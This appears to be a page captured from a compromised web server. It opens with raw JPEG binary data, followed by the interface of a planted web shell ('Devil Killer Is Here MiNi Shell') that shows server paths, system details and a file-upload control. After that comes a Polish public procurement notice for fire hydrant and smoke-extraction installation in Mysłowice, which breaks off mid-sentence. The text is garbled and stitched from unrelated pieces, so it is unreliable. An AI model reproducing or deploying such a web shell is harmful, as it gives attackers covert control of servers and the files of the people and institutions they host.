JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210703/0010339601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00103396 z dnia 2021-07-03</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> WYKONANIE WEWNĘTRZNEJ INSTALACJI HYDRANTOWEJ I WYKONANIE INSTALACJI ODDYMIANIA KLATEK SCHODOWYCH W BUDYNKU UŻYTECZNOŚCI PUBLICZNEJ W MYSŁOWICACH PRZY UL. MIKOŁOWSKIEJ 4A </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Mysowice</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Miejski Zarząd Gospodarki Komunalnej w Mysłowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271570799</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Partyzantów 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mysłowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mzgk@mzgk.myslowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://mzgk.myslowice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> WYKONANIE WEWNĘTRZNEJ INSTALACJI HYDRANTOWEJ I WYKONANIE INSTALACJI ODDYMIANIA KLATEK SCHODOWYCH W BUDYNKU UŻYTECZNOŚCI PUBLICZNEJ W MYSŁOWICACH PRZY UL. MIKOŁOWSKIEJ 4A </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2205142c-dbdf-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00103396</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00012819/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Wykonanie wewnętrznej instalacji hydrantowej i wykonanie instalacji oddymiania klatek schodowych w budynku użyteczności publicznej w Mysłowicach przy ul. Mikołowskiej 4A </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mzgk.nowybip.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">: miniPortal który dostępny jest pod<br/>adresem: https://miniportal.uzp.gov.pl, ePUAP dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal, oraz poczta elektroniczna: mzgk@mzgk.myslowice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Dokumenty muszą być złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców<br/>zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy<br/>organizacyjnej lub innym dokumencie.Wykonawca zamierzający wziąć udział w postępowaniu o<br/>udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto<br/>na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty<br/>lub wniosku” oraz do „Formularza do komunikacji”. Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku”<br/>i „Formularza do komunikacji” wynosi 150 MB. Za datę przekazania oferty, wniosków, zawiadomień,<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz<br/>innych informacji przyjmuje się datę ich przekazania na ePUAP Zamawiajacego. Zamawiający<br/>przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej SWZ. Dane<br/>postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając<br/>wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania. Zgodnie z art. 63<br/>ust. 2 Ustawy PZP ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Przez to należy rozumieć<br/>złożenie prawidłowo podpisanych dokumentów (opatrzonych prawidłowymi podpisami kwalifikowanymi,<br/>osobistymi, które zostały wskazane dokładnie wyżej) w formie elektornicznej lub w postaci<br/>elektronicznej przy pomocy ePUAP. Wszelkie podpisy elektroniczne winny zostać złożone przy pomocy<br/>programu wskazanego przez dostawcę usługi zaufania wystawiającego certyfikat podpisu<br/>kwalifikowanego dla osób podpisujących. Wykonawca ma prawo złożyć tylko jedną ofertę. Oferty<br/>wykonawcy, który przedłoży więcej niż jedną ofertę, zostaną odrzucone. Do upływu terminu składania<br/>ofert wykonawca może zmienić lub wycofać ofertę.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, zamawiający - Miejski Zarząd Gospodarki Komunalnej w<br/>Mysłowicach - informuje, że: administratorem danych osobowych jest Miejski Zarząd Gospodarki<br/>Komunalnej w Mysłowicach, ul. Partyzantów 21, 41-400 Mysłowice – reprezentowane przez Dyrektora<br/>dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie niniejszego zamówienia publicznego, odbiorcami danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz<br/>art. 96 ust. 3 ustawy Pzp; ponadto dane osobowe mogą zostać przekazane na zasadach wynikających<br/>z ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej. dane osobowe będą<br/>przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres obowiązywania Umowy, a następnie<br/>przez 2 lata licząc od dnia 31 grudnia następującego po złożeniu zestawienia wydatków do Komisji<br/>Europejskiej, w którym ujęto ostatecznie wydatki dotyczące zakończenia projektu. Termin ten może<br/>zostać wydłużony w uzasadnionych przypadkach przez IZ. Okresy te dotyczą również wykonawców,<br/>którzy złożyli oferty i nie zostały one uznane jako najkorzystniejsze (nie zawarto z tymi wykonawcami<br/>Umowy). obowiązek podania danych osobowych bezpośrednio dotyczących osób fizycznych jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp; w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO; osoba fizyczna posiada: na podstawie art. 15 RODO<br/>prawo dostępu do danych osobowych jej dotyczących; na podstawie art. 16 RODO prawo do<br/>sprostowania jej danych osobowych; na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO; prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna,<br/>że przetwarzanie danych osobowych jej dotyczących narusza przepisy RODO; osobie fizycznej nie<br/>przysługuje: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21<br/>RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO. W przypadku, gdy dla należytej<br/>realizacji zamówienia, konieczne będzie przetwarzanie danych osobowych, Strony zachowają w tym<br/>zakresie wszelkie wymagania wynikające z przepisów prawa polskiego oraz z przepisów bezpośrednio<br/>stosowanego prawa Unii Europejskiej w tym z przepisów Rozporządzenia Parlamentu Europejskiego i<br/>Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) oraz ustawy z dnia 10 maja 2018 r. o<br/>ochronie danych osobowych (Dz. U. z 2019 r., poz. 1781). Jednocześnie w przypadku, o którym mowa<br/>w zdaniu poprzednim Strony zawartych Umów zawrą dodatkowe umowy o powierzeniu przetwarzania<br/>danych osobowych wykonawcy i podwykonawców bez dodatkowego (tj. wykraczającego poza<br/>wskazane w zawartych Umowach) wynagrodzenia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.7.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu instalacji oddymiania<br/>klatek schodowych oraz instalacji przeciwpożarowych wewnętrznych hydrantowych w budynku<br/>użyteczności publicznej położonym w Mysłowicach przy ul. Mikołowskiej 4A. Zakres przedmiotu<br/>zmówienia obejmuje roboty budowlane, hydrauliczne oraz sanitarne wykonane w obiekcie, nie<br/>wykraczające poza obrys zewnętrzny budynku – nie zmienia się kubatura oraz powierzchnia<br/>zabudowy. Istniejący układ konstrukcyjny również pozostaje bez zmian. Szczegółowy opis<br/>przedmiotu zamówienia stanowią Załącznik nr 1.1 do SWZ – Dokumentacja Techniczna - dot.<br/>instalacji p. poż. wewnętrznej hydrantowej oraz Załącznik nr 1.2 do SWZ Dokumentacja<br/>Techniczna – dot. Instalacji oddymiania klatek schodowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45300000-0 - Roboty instalacyjne w budynkach</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45312000-7 - Instalowanie systemów alarmowych i anten</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami i ich wagami: <br/><br/><br/>1. Cena oferty (C) 60% <br/><br/>2. Gwarancja (G) 20% <br/><br/>3.Termin realizacji robót (T) 20% <br/><br/><br/><br/>Cena ofert (C) <br/><br/>W ramach kryterium ceny oferta otrzyma zaokrągloną do dwóch miejsc po przecinku zgodnie z przybliżeniem dziesiętnym ilość punktów wynikającą z działania: <br/><br/>Oferta z najniższą ceną <br/><br/>___________________________ x 60 pkt. <br/><br/>Cena oferty badanej <br/><br/>Przez „cenę” należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r., poz. 178) <br/><br/>Wydłużenie okresu gwarancji (G) <br/><br/>W przypadku kryterium "wydłużenie okresu gwarancji" do oceny będzie brana pod uwagę gwarancja zadeklarowana przez wykonawcę w Formularzu ofertowym - Załącznik nr 3 do SWZ. <br/><br/>Każdy z wykonawców zobowiązany jest do udzielenia minimum 48 miesięcy gwarancji. <br/><br/>Zamawiający przyzna punkty za wydłużenie okresu gwarancji w następujący sposób: <br/><br/>G = 0, jeżeli wykonawca zaoferuje 48 miesięcy gwarancji (termin minimalny wymagany), <br/><br/>G = 10, jeżeli wykonawca zaoferuje 54 miesięcy gwarancji, <br/><br/>G = 20, jeżeli wykonawca zaoferuje 60 miesięcy gwarancji. <br/><br/>W przypadku, gdy wykonawca zaoferuje gwarancję, pomiędzy przedziałami określonymi powyżej zamawiający przyzna punkty w ilości odpowiadającej dolnej wartości przedziału (np. w przypadku zaoferowania 25 miesięcy gwarancji wykonawca otrzyma 0 pkt, w przypadku zaoferowania 37 miesięcy gwarancji wykonawca otrzyma 10 pkt, 49 i powyżej 20 pkt) <br/><br/>Do umowy przyjęty zostanie okres gwarancji faktycznie zaoferowany przez wykonawcę w ofercie. Niewpisanie żadnego okresu gwarancji spowoduje uznanie, że okres gwarancji będzie zgodny z wymaganiami określonymi w SWZ (24 miesięcy). <br/><br/>Termin realizacji robót (T) <br/><br/>W przypadku kryterium "termin realizacji robót" do oceny będzie brany pod uwagę termin zadeklarowany przez wykonawcę w Formularzu ofertowym - Załącznik nr 3 do SWZ. Każdy z wykonawców zobowiązany jest do wykonania robót w maksymalnym terminie 8 miesięcy od dnia podpisania Umowy. <br/><br/>Zamawiający przyzna punkty za skrócenie terminu realizacji robót w następujący sposób: <br/><br/>T = 0, jeżeli wykonawca zaoferuje 4 miesiące (termin minimalny wymagany), <br/><br/>T = 10, jeżeli wykonawca zaoferuje 3,5 miesiąca, <br/><br/>T = 20, jeżeli wykonawca zaoferuje 3 miesiące, <br/><br/>Zamawiający nie dopuszcza wskazywania terminów realizacji robót innych niż wskazane powyżej. Wykonawca, który zaoferuje inne niż wskazane powyżej wartości, otrzyma 0 punktów w niniejszym kryterium. <br/><br/>W celu ostatecznego wyboru najkorzystniejszej oferty złożonej na wykonanie zamówienia w powiązaniu z przedstawionymi wyżej kryteriami zamawiający posłuży się następującym wzorem: <br/><br/>PO = C + G + T <br/><br/>gdzie: <br/><br/>PO – liczba punktów przyznanych ofercie <br/><br/>C – liczba punktów w kryterium „cena oferty” <br/><br/>G – liczba punktów w kryterium „gwarancja” <br/><br/>T – liczba punktów w kryterium „termin”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu<br/>dotyczące zdolności technicznej lub zawodowej. Zamawiający uzna warunek za spełniony, jeżeli<br/>Wykonawca ubiegający się o udzielenie zamówienia, wykaże, że: a) w okresie ostatnich 5 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w<br/>tym okresie, wykonał należycie i prawidłowo ukończył: - dwie roboty budowlane polegające na<br/>wykonaniu instalacji przeciwpożarowych hydrantowych wewnętrznych i instalacji oddymiania<br/>klatek schodowych czynnego obiektu budowlanego – o wartości nie mniejszej niż 50 000,00 zł<br/>brutto każda. UWAGA: W przypadku, gdy wartość zamówień wykazanych przez wykonawcę<br/>celem potwierdzenia spełniania warunków udziału w postępowaniu wyrażona będzie w walucie<br/>obcej, zamawiający przeliczy tę wartość na walutę polską w oparciu o średni kurs walut NBP,<br/>dla danej waluty, z daty wszczęcia postępowania. Jeżeli w tym dniu nie będzie opublikowany<br/>średni kurs NBP, zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem<br/>postępowania. UWAGA: W przypadku, gdy ww. zakres robót budowlanych będzie stanowił<br/>część robót o szerszym zakresie, Wykonawca zobowiązany jest wyodrębnić rodzajowo i<br/>kwotowo roboty, o których mowa powyżej. b) dysponuje lub będzie dysponował i skieruje do<br/>realizacji zamówienia: - co najmniej 1 osobę w roli kierownika budowy - posiadającą uprawnienia<br/>bez ograniczeń w specjalności konstrukcyjno-budowlanej bez ograniczeń, lub inne uprawnienia<br/>umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym<br/>stanie prawnym upoważniają uprawnienia budowlane w tej specjalności. - co najmniej 1 osobę w<br/>roli kierownika robót - posiadającą uprawnienia bez ograniczeń w specjalności elektrycznej do<br/>kierowania robotami budowlanymi, lub inne uprawnienia umożliwiające wykonywanie tych<br/>samych czynności, do wykonywania których w aktualnym stanie prawnym upoważniają<br/>uprawnienia budowlane w tej specjalności. - co najmniej 1 osobę – w roli kierownika robót –<br/>posiadającą uprawnienia bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do kierowania robotami budowlanymi, lub inne uprawnienia umożliwiające wykonywanie tych<br/>samych czynności, do wykonywania których w aktualnym stanie prawnym upoważniają<br/>uprawnienia budowlane w tej specjalności. UWAGA: W przypadku Wykonawców zagranicznych<br/>dopuszcza się kwalifikacje równoważne do zdobytych w innych państwach, na zasadach<br/>określonych w art. 12a ustawy Prawo budowlane. UWAGA: Zgodnie z art. 12 ust. 7 ustawy<br/>Prawo budowlane, podstawę do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie stanowi wpis, w drodze decyzji, do centralnego rejestru, o którym mowa w art. 88a<br/>ust. 1 pkt 3 lit. a ustawy Prawo budowlane oraz – zgodnie z odrębnymi przepisami wpis na listę<br/>członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym<br/>przez tę izbę, z określonym w nim terminem ważności. UWAGA: Zamawiający dopuszcza<br/>możliwość łączenia funkcji, w przypadku osób, które posiadają uprawnienia w więcej niż jednej<br/>specjalności w obszarze kierowania budową / robotami. c) dysponuje lub będzie dysponował i<br/>skieruje do realizacji zamówienia: - w zakresie wykonania instalacji systemu oddymiania<br/>pracowników 